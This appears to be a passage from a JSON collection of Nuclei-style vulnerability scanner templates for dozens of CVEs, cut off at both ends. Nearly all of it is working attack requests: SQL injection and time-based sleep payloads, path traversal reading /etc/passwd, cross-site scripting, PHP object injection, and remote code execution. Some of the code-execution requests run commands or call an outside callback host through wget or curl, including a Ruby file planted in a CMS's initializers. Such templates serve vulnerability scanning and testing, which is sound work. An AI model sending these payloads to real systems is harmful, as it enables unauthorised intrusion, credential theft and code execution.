name=\"newLanguageName\"\n\n{{randstr}}\n------WebKitFormBoundaryFcBwsDjo5LkYWGWE--\n"],"matchers":[{"type":"dsl","dsl":["status_code_1 == 302 && status_code_2 == 302","contains(interactsh_protocol, 'dns')","contains(body_3, \"confluence\")"],"condition":"and"}]}]},{"id":"CVE-2024-37881","info":{"name":"SiteGuard WP Plugin <= 1.7.6 - Login Page Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/siteguard/readme.txt"],"matchers":[{"type":"dsl","internal":true,"dsl":["status_code == 200","contains(body, \"SiteGuard WP Plugin\")"],"condition":"and"}]},{"method":"GET","path":["{{BaseURL}}/wp-register.php"],"matchers":[{"type":"dsl","dsl":["!contains(tolower(location), 'wp-login.php')"]}],"extractors":[{"type":"kval","kval":["location"]}]}]},{"id":"CVE-2024-36837","info":{"name":"CRMEB v.5.2.2 - SQL Injection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/products?limit=20&priceOrder=&salesOrder=&selectId=GTID_SUBSET(CONCAT(0x7e,(SELECT+(ELT(3550=3550,md5({{num}})))),0x7e),3550)"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5(num)}}","SQLSTATE"],"condition":"and"},{"type":"word","part":"content_type","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-5947","info":{"name":"Deep Sea Electronics DSE855 - Authentication Bypass","severity":"medium"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body,\"Copyright Deep Sea Electronics\")","status_code == 200"],"condition":"and","internal":true}]},{"raw":["GET /Backup.bin HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(content_type,\"Unknown\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2024-29972","info":{"name":"Zyxel NAS326 Firmware < V5.21(AAZF.17)C0 - NsaRescueAngel Backdoor Account","severity":"critical"},"requests":[{"raw":["GET /desktop,/cgi-bin/remote_help-cgi/favicon.ico?type=sshd_tdc HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(body, 'result=0')"],"condition":"and"}]}]},{"id":"CVE-2024-2330","info":{"name":"NS-ASG Application Security Gateway 6.3 - Sql Injection","severity":"medium"},"requests":[{"raw":["POST /protocol/index.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\njsoncontent={\"protocolType\":\"addmacbind\",\"messagecontent\":[\"{\\\"BandIPMacId\\\":\\\"1\\\",\\\"IPAddr\\\":\\\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\\\",\\\"MacAddr\\\":\\\"\\\",\\\"DestIP\\\":\\\"\\\",\\\"DestMask\\\":\\\"255.255.255.0\\\",\\\"Description\\\":\\\"Sample+Description\\\"}\"]}\n"],"matchers":[{"type":"dsl","dsl":["contains_all(body,\"XPATH syntax error:\",\"alert\") && contains(header,\"text/html\")","status_code == 200"],"condition":"and"}],"extractors":[{"type":"regex","name":"version","group":1,"regex":["XPATH syntax error: '([~0-9.]+)'"]}]}]},{"id":"CVE-2024-40422","info":{"name":"Devika v1 - Path Traversal","severity":"critical"},"requests":[{"raw":["GET /api/data HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains_all(body,\"models\",\"projects\",\"OPENAI\",\"OLLAMA\")","contains(content_type,\"application/json\")","status_code == 200"],"condition":"and","internal":true}]},{"raw":["GET /api/get-browser-snapshot?snapshot_path=../../../../etc/passwd HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"word","part":"header","words":["application/octet-stream"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-7339","info":{"name":"TVT DVR Sensitive Device - Information Disclosure","severity":"medium"},"requests":[{"raw":["POST /queryDevInfo HTTP/1.1\nHost: {{Hostname}}\n\n<?xml version=\"1.0\" encoding=\"utf-8\" ?><request version=\"1.0\" systemType=\"NVMS-9000\" clientType=\"WEB\"/>\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["softwareVersion","eth0"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-7786","info":{"name":"Sensei LMS < 4.24.2 - Email Template Leak","severity":"high"},"requests":[{"raw":["GET /index.php/wp-json/wp/v2/sensei_email/ HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains_all(body,\"id\",\"date_gmt\",\"slug\")","contains(content_type,\"application/json\")","status_code == 200"],"condition":"and","internal":true}],"extractors":[{"type":"json","part":"body","name":"template_id","json":[".[0].id"],"internal":true}]},{"raw":["GET /index.php/wp-json/wp/v2/sensei_email/{{template_id}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["sensei_email_preview_id={{template_id}}","media?parent={{template_id}}"],"condition":"and"},{"type":"word","part":"content_type","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-3234","info":{"name":"Chuanhu Chat - Directory Traversal","severity":"critical"},"requests":[{"raw":["GET /file=web_assets/../config.json HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"openai_api_key\":","\"openai_api_type\":"],"condition":"and"},{"type":"word","part":"content_type","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-5975","info":{"name":"CZ Loan Management <= 1.1 - SQL Injection","severity":"critical"},"requests":[{"raw":["GET /wp-content/plugins/cz-loan-management/README.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body,\"CZ Loan Management\")","status_code == 200"],"condition":"and","internal":true}]},{"raw":["@timeout 20s\nPOST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=cz_plugin_for_user_get_percentage&selectedperiod=(select*from(select(sleep(6)))a)\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","contains(content_type,\"text/html\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2024-27198","info":{"name":"TeamCity < 2023.11.4 - Authentication Bypass","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/hax?jsp=/app/rest/server;.jsp"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(header, \"application/xml\")","contains_all(body, \"buildNumber\", \"server version\", \"internalId\")"],"condition":"and"}]}]},{"id":"CVE-2024-41955","info":{"name":"Open Redirect in Login Redirect - MobSF","severity":"medium"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n","POST /login/?next=//interact.sh HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}\n"],"host-redirects":true,"matchers":[{"type":"regex","part":"header_2","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)?(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2024-7854","info":{"name":"Woo Inquiry <= 0.1 - SQL Injection","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body,\"/wp-content/plugins/woo-inquiry\")"],"internal":true}]},{"raw":["@timeout: 20s\nPOST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\naction=woo_wpinq_times_up&dbid=(SELECT(0)FROM(SELECT(SLEEP(6)))a)\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","contains(content_type, \"text/html\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2024-37152","info":{"name":"Argo CD Unauthenticated Access to sensitive setting","severity":"medium"},"requests":[{"raw":["GET /api/v1/settings HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"passwordPattern\":","\"appLabelKey\":"],"condition":"and"},{"type":"word","part":"content_type","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-33113","info":{"name":"D-LINK DIR-845L bsc_sms_inbox.php file - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/getcfg.php?a=%0A_POST_SERVICES=DEVICE.ACCOUNT%0AAUTHORIZED_GROUP=1"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<service>DEVICE.ACCOUNT</service>","<seqno>"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-22207","info":{"name":"Fastify Swagger-UI - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/documentation/playwright.config.js"],"matchers-condition":"and","matchers":[{"type":"word","words":["module.exports","defineConfig"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-3742","info":{"name":"Electrolink FM/DAB/TV Transmitter (controlloLogin.js) - Credentials Disclosure","severity":"high"},"requests":[{"raw":["GET /controlloLogin.js HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(content_type, \"application/x-javascript\")","contains(body, \"user==\") && contains(body, \"password==\")","status_code == 200"],"condition":"and"}],"extractors":[{"type":"regex","part":"body","regex":["user\\s*==\\s*'([^']*)'\\s*&&\\s*password\\s*==\\s*'([^']*)'"]}]}]},{"id":"CVE-2024-20440","info":{"name":"Cisco Smart Licensing Utility UnAuthenticated Logs Exposure Leaking Plaintext Credentials","severity":"high"},"requests":[{"raw":["GET /cslu/v1/var/logs/customer-cslu-lib-log.log HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["csluev.log"]},{"type":"word","part":"content_type","words":["text/x-log"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-46986","info":{"name":"Camaleon CMS < 2.8.1 Arbitrary File Write to RCE","severity":"critical"},"requests":[{"raw":["GET /admin/login HTTP/1.1\nHost: {{Hostname}}\n"],"extractors":[{"type":"regex","part":"body","internal":true,"name":"nonce","group":1,"regex":["name=\"authenticity_token\" value=\"(.*?)\""]}]},{"raw":["POST /admin/login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nConnection: keep-alive\n\nauthenticity_token={{nonce}}&user%5Busername%5D={{username}}&user%5Bpassword%5D={{password}}\n"],"matchers":[{"type":"dsl","dsl":["contains(location,\"/admin/dashboard\")"],"internal":true}]},{"raw":["POST /admin/media/upload?actions=false HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data;boundary=----WebKitFormBoundarynJs8ffRP2MgQXiF8\n\n------WebKitFormBoundarynJs8ffRP2MgQXiF8\nContent-Disposition: form-data; name=\"file_upload\"; filename=\"{{filename}}.rb\"\nContent-Type: text/x-ruby-script\n\n`curl {{interactsh-url}}`\n------WebKitFormBoundarynJs8ffRP2MgQXiF8\nContent-Disposition: form-data; name=\"folder\"\n\n../../../config/initializers/\n------WebKitFormBoundarynJs8ffRP2MgQXiF8\nContent-Disposition: form-data; name=\"skip_auto_crop\"\n\ntrue\n------WebKitFormBoundarynJs8ffRP2MgQXiF8--\n"],"matchers":[{"type":"word","part":"body","words":["{\"name\":\"{{filename}}.rb\",\"folder_path\":\"../../../config/initializers\""],"internal":true}]},{"raw":["POST /admin/media/upload?actions=false HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data;boundary=----WebKitFormBoundarynJs8ffRP2MgQXiF8\n\n------WebKitFormBoundarynJs8ffRP2MgQXiF8\nContent-Disposition: form-data; name=\"file_upload\"; filename=\"restart.txt\"\nContent-Type: text/x-ruby-script\n\n{{randstr}}\n------WebKitFormBoundarynJs8ffRP2MgQXiF8\nContent-Disposition: form-data; name=\"folder\"\n\n../../../tmp/\n------WebKitFormBoundarynJs8ffRP2MgQXiF8\nContent-Disposition: form-data; name=\"skip_auto_crop\"\n\ntrue\n------WebKitFormBoundarynJs8ffRP2MgQXiF8--\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["{\"name\":\"restart.txt\",\"folder_path\":\"../../../tmp\""]}]}]},{"id":"CVE-2024-28734","info":{"name":"Coda v.2024Q1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /coda/frameset?cols=\"><frame%20src=\"javascript:alert(document.domain)\"> HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<frameset cols=\"\"><frame src=\"javascript:alert(document.domain)\">"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-7714","info":{"name":"AI Assistant with ChatGPT by AYS <= 2.0.9 - Unauthenticated AJAX Calls","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?ays_chatgpt_assistant_id=1&action=ays_chatgpt_admin_ajax&function=ays_chatgpt_disconnect"],"matchers":[{"type":"dsl","dsl":["regex(\"^true$\", body)","contains(content_type, \"text/html\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2024-3274","info":{"name":"D-LINK DNS-320L,DNS-320LW and DNS-327L - Information Disclosure","severity":"medium"},"requests":[{"raw":["GET /cgi-bin/info.cgi HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains_all(body, \"Model=\", \"Build=\", \"Macaddr=\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2024-43917","info":{"name":"WordPress TI WooCommerce Wishlist Plugin <= 2.8.2 - SQL Injection","severity":"critical"},"requests":[{"raw":["GET /?p=1 HTTP/1.1\nHost: {{Hostname}}\n"],"redirects":true,"extractors":[{"type":"regex","part":"body","internal":true,"name":"nonce","group":1,"regex":["\"nonce\":\"([a-z0-9]+)\""]}]},{"raw":["GET /product-category/uncategorized/ HTTP/1.1\nHost: {{Hostname}}\n"],"extractors":[{"type":"regex","part":"body","internal":true,"name":"product_id","group":1,"regex":["data-tinvwl_product_id=\"([0-9]+)\""]}],"matchers":[{"type":"word","part":"body","words":["data-tinvwl_product_id=\""],"internal":true}]},{"raw":["POST /product-category/uncategorized/ HTTP/1.1\nHost: {{Hostname}}\nX-Requested-With: XMLHttpRequest\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryNfcbSwJQX8ALWCMG\n\n------WebKitFormBoundaryNfcbSwJQX8ALWCMG\nContent-Disposition: form-data; name=\"form[tinvwl-hidden-fields]\"\n\n[]\n------WebKitFormBoundaryNfcbSwJQX8ALWCMG\nContent-Disposition: form-data; name=\"tinv_wishlist_id\"\n\n\n------WebKitFormBoundaryNfcbSwJQX8ALWCMG\nContent-Disposition: form-data; name=\"tinv_wishlist_name\"\n\n\n------WebKitFormBoundaryNfcbSwJQX8ALWCMG\nContent-Disposition: form-data; name=\"product_type\"\n\nsimple\n------WebKitFormBoundaryNfcbSwJQX8ALWCMG\nContent-Disposition: form-data; name=\"product_id\"\n\n{{product_id}}\n------WebKitFormBoundaryNfcbSwJQX8ALWCMG\nContent-Disposition: form-data; name=\"product_variation\"\n\n0\n------WebKitFormBoundaryNfcbSwJQX8ALWCMG\nContent-Disposition: form-data; name=\"product_action\"\n\naddto\n------WebKitFormBoundaryNfcbSwJQX8ALWCMG\nContent-Disposition: form-data; name=\"redirect\"\n\n{{RootURL}}/product-category/uncategorized/\n------WebKitFormBoundaryNfcbSwJQX8ALWCMG--\n"],"extractors":[{"type":"json","part":"body","name":"share_key","internal":true,"json":[".wishlist.share_key"]}]},{"raw":["@timeout: 20s\nGET /wp-json/wc/v3/wishlist/{{share_key}}/get_products?order=,(select*from(select(sleep(6)))a)--+- HTTP/1.1\nHost: {{Hostname}}\nX-WP-Nonce: {{nonce}}\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["duration>=6","contains(content_type, 'application/json')","contains(body, 'product_id')"],"condition":"and"}]}]},{"id":"CVE-2024-6782","info":{"name":"Calibre <= 7.14.0 Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /interface-data/books-init HTTP/1.1\nHost: {{Hostname}}\nReferer: {{RootURL}}\n"],"extractors":[{"type":"json","name":"book_ids","internal":true,"json":[".search_result.book_ids[0]"]}]},{"raw":["POST /cdb/cmd/list HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n[\n [\"template\"],\n \"\",\n \"\",\n \"\",\n {{book_ids}},\n \"python:def evaluate(a, b):\\n import subprocess\\n try:\\n return subprocess.check_output(['cmd.exe', '/c', 'whoami'])\\n except Exception:\\n return subprocess.check_output(['sh', '-c', 'whoami'])\\n\"\n]\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["b'([^']+)"]},{"type":"word","part":"content_type","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-28995","info":{"name":"SolarWinds Serv-U - Directory Traversal","severity":"high"},"requests":[{"raw":["GET /?InternalDir=/../../../../windows&InternalFile=win.ini HTTP/1.1\nHost: {{Hostname}}\n","GET /?InternalDir=\\..\\..\\..\\..\\etc&InternalFile=passwd HTTP/1.1\nHost: {{Hostname}}\n"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:","\\[(font|extension|file)s\\]"],"condition":"or"},{"type":"dsl","dsl":["contains(header, \"Serv-U\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2024-5932","info":{"name":"GiveWP - PHP Object Injection","severity":"critical"},"requests":[{"raw":["GET /wp-json/wp/v2/give_forms/ HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","part":"body","words":["\"type\":","\"guid\":"],"condition":"and","internal":true}],"extractors":[{"type":"json","part":"body","name":"value","internal":true,"json":[".[0].slug"]},{"type":"json","part":"body","name":"give-form-title","internal":true,"json":[".[0].title.rendered"]},{"type":"json","part":"body","name":"links","internal":true,"json":[".[0].link"]}]},{"raw":["GET /give/{{value}}?giveDonationFormInIframe=1 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","part":"body","words":["give-form-hash","give-form-id-prefix"],"condition":"and","internal":true}],"extractors":[{"type":"regex","part":"body","group":1,"name":"give-form-hash","internal":true,"regex":["name=\"give\\-form\\-hash\" value=\"([0-9a-z]+)\""]},{"type":"regex","part":"body","group":1,"name":"give-form-id-prefix","internal":true,"regex":["name=\"give\\-form\\-id\\-prefix\" value=\"([0-9-]+)\""]},{"type":"regex","part":"body","group":1,"name":"give-form-id","internal":true,"regex":["name=\"give\\-form\\-id\" value=\"([0-9]+)\""]},{"type":"regex","part":"body","group":1,"name":"give-amount","internal":true,"regex":["give\\-form\\-minimum\"\\n\\s+value=\"([0-9.]+)\"\\/>"]}]},{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\ngive-honeypot=&give-form-id-prefix={{give-form-id-prefix}}&give-form-id={{give-form-id}}&give-form-title={{give-form-title}}&give-current-url={{links}}&give-form-url={{RootURL}}&give-form-minimum={{give-amount}}&give-form-maximum=1000000&give-form-hash={{give-form-hash}}&give-price-id=custom&give-amount={{give-amount}}&give_first={{firstname}}&give_last={{lastname}}&give_email={{email}}&give_stripe_payment_method=&give-user-id=1&give_action=purchase&give-gateway=manual&give_embed_form=1&action=give_process_donation&&give_title={{payload}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"body","words":["\"error_data\"","\"unknown_error\""],"condition":"and"}]}]},{"id":"CVE-2024-25669","info":{"name":"CaseAware a360inc - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/login.php?mid=0&usr=test%27%20draggable=true%20ondrag=alert(document.domain)%20value=%27p"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["value='test' draggable=true ondrag=alert(document.domain)","CaseAware"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2000-0760","info":{"name":"Jakarta Tomcat 3.1 and 3.0 - Exposure","severity":"low"},"requests":[{"method":"GET","path":["{{BaseURL}}/examples/jsp/snp/snoop.jsp"],"matchers-condition":"and","matchers":[{"type":"word","words":["Request Information","Path info","Server name","Remote address"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2000-0114","info":{"name":"Microsoft FrontPage Extensions Check (shtml.dll)","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/_vti_inf.html"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["_vti_bin/shtml.dll"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-16996","info":{"name":"Metinfo 7.0.0 beta - SQL Injection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/admin/?n=product&c=product_admin&a=dopara&app_type=shop&id=1%20union%20SELECT%201,2,3,25367*75643,5,6,7%20limit%205,1%20%23"],"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["1918835981"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-16278","info":{"name":"nostromo 1.9.6 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /.%0d./.%0d./.%0d./.%0d./bin/sh HTTP/1.1\nHost: {{Hostname}}\n\necho\necho\ncat /etc/passwd 2>&1\n"],"matchers":[{"type":"regex","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2019-12988","info":{"name":"Citrix SD-WAN Center - Remote Command Injection","severity":"critical"},"requests":[{"raw":["GET /login HTTP/1.1\nHost: {{Hostname}}\n","GET /Collector/nms/addModifyZTDProxy?ztd_server=127.0.0.1&ztd_port=3333&ztd_username=user&ztd_password=$(/bin/wget$IFShttp://{{interactsh-url}}) HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n\n"],"unsafe":true,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(body_1, \"<title>Citrix SD-WAN\")"]},{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2019-3398","info":{"name":"Atlassian Confluence Download Attachments - Remote Code Execution","severity":"high"},"requests":[{"raw":["POST /dologin.action HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nos_username={{username}}&os_password={{password}}&login=Log%2Bin&os_destination=\n","GET /pages/createpage.action HTTP/1.1\nHost: {{Hostname}}\n","POST /plugins/drag-and-drop/upload.action?draftId={{draftID}}&filename=../../../../../../opt/atlassian/confluence/confluence/pages/{{randstr}}.jsp&size=8&mimeType=text%2Fplain&atl_token={{csrftoken}} HTTP/1.1\nHost: {{Hostname}}\n\n${{{num1}}*{{num2}}}\n","GET /pages/downloadallattachments.action?pageId={{draftID}} HTTP/1.1\nHost: {{Hostname}}\n","GET /pages/{{randstr}}.jsp HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body_5","words":["{{result}}"]}],"extractors":[{"type":"regex","name":"csrftoken","group":1,"regex":["name=\"atlassian\\-token\" content=\"([a-z0-9]+)\"> "],"internal":true,"part":"body"},{"type":"regex","name":"draftID","group":1,"regex":["ta name=\"ajs\\-draft\\-id\" content=\"([0-9]+)\">"],"internal":true,"part":"body"}]}]},{"id":"CVE-2019-8937","info":{"name":"HotelDruid 2.3.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/hoteldruid/visualizza_tabelle.php?anno=2019&id_sessione=&tipo_tabella=prenotazioni&subtotale_selezionate=1&num_cambia_pren=1&cerca_id_passati=1&cambia1=3134671%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"\">CDGPermissions"]}]}]},{"id":"CVE-2019-10098","info":{"name":"Apache HTTP server v2.4.0 to v2.4.39 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/http%3A%2F%2Fwww.interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)?(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2019-7481","info":{"name":"SonicWall SRA 4600 VPN - SQL Injection","severity":"high"},"requests":[{"raw":["POST /cgi-bin/supportInstaller HTTP/1.1\nHost: {{Hostname}}\nAccept-Encoding: identity\nUser-Agent: MSIE\nContent-Type: application/x-www-form-urlencoded\n\nfromEmailInvite=1&customerTID=unpossible'+UNION+SELECT+0,0,0,11132*379123,0,0,0,0--\n"],"matchers":[{"type":"word","part":"body","words":["4220397236"]}]}]},{"id":"CVE-2019-6340","info":{"name":"Drupal - Remote Code Execution","severity":"high"},"requests":[{"method":"POST","path":["{{BaseURL}}/node/1?_format=hal_json"],"body":"{ \"link\": [ { \"value\": \"link\", \"options\": \"O:24:\\\"GuzzleHttp\\\\Psr7\\\\FnStream\\\":2:{s:33:\\\"\\u0000GuzzleHttp\\\\Psr7\\\\FnStream\\u0000methods\\\";a:1:{s:5:\\\"close\\\";a:2:{i:0;O:23:\\\"GuzzleHttp\\\\HandlerStack\\\":3:{s:32:\\\"\\u0000GuzzleHttp\\\\HandlerStack\\u0000handler\\\";s:2:\\\"id\\\";s:30:\\\"\\u0000GuzzleHttp\\\\HandlerStack\\u0000stack\\\";a:1:{i:0;a:1:{i:0;s:6:\\\"system\\\";}}s:31:\\\"\\u0000GuzzleHttp\\\\HandlerStack\\u0000cached\\\";b:0;}i:1;s:7:\\\"resolve\\\";}}s:9:\\\"_fn_close\\\";a:2:{i:0;r:4;i:1;s:7:\\\"resolve\\\";}}\" } ], \"_links\": { \"type\": { \"href\": \"http://192.168.1.25/drupal-8.6.9/rest/type/shortcut/default\" } } }","matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["uid=","gid=","groups="],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-16469","info":{"name":"Adobe Experience Manager - Expression Language Injection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/mnt/overlay/dam/gui/content/assets/metadataeditor.external.html?item=$%7b{{num1}}*{{num2}}%7d"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["data-formid=\"{{result}}\"","Embed Code"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-19368","info":{"name":"Rumpus FTP Web File Manager 8.2.9.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/Login?!'>"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-15858","info":{"name":"WordPress Woody Ad Snippets <2.2.5 - Cross-Site Scripting/Remote Code Execution","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/insert-php/readme.txt"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","negative":true,"words":["2.2.5"]},{"type":"word","part":"body","words":["Changelog"]},{"type":"word","part":"body","words":["Woody ad snippets"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-3929","info":{"name":"Barco/AWIND OEM Presentation Platform - Remote Command Injection","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/cgi-bin/file_transfer.cgi"],"body":"file_transfer=new&dir=%27Pa_Noteexpr%20curl%2b{{interactsh-url}}Pa_Note%27","headers":{"Content-Type":"application/x-www-form-urlencoded"},"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2019-7275","info":{"name":"Optergy Proton/Enterprise Building Management System - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/updating.jsp?url=https://interact.sh/"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$"]}]}]},{"id":"CVE-2019-16525","info":{"name":"WordPress Checklist <1.1.9 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/checklist/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Checklist","Tags:"],"condition":"and"}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/checklist/images/checklist-icon.php?&fill=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":[""]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-15713","info":{"name":"WordPress My Calendar <= 3.1.9 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/my-calendar/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["My Calendar","Tags:"],"condition":"and"}]},{"method":"GET","path":["{{BaseURL}}/?rsd=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":[""]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-20933","info":{"name":"InfluxDB <1.7.6 - Authentication 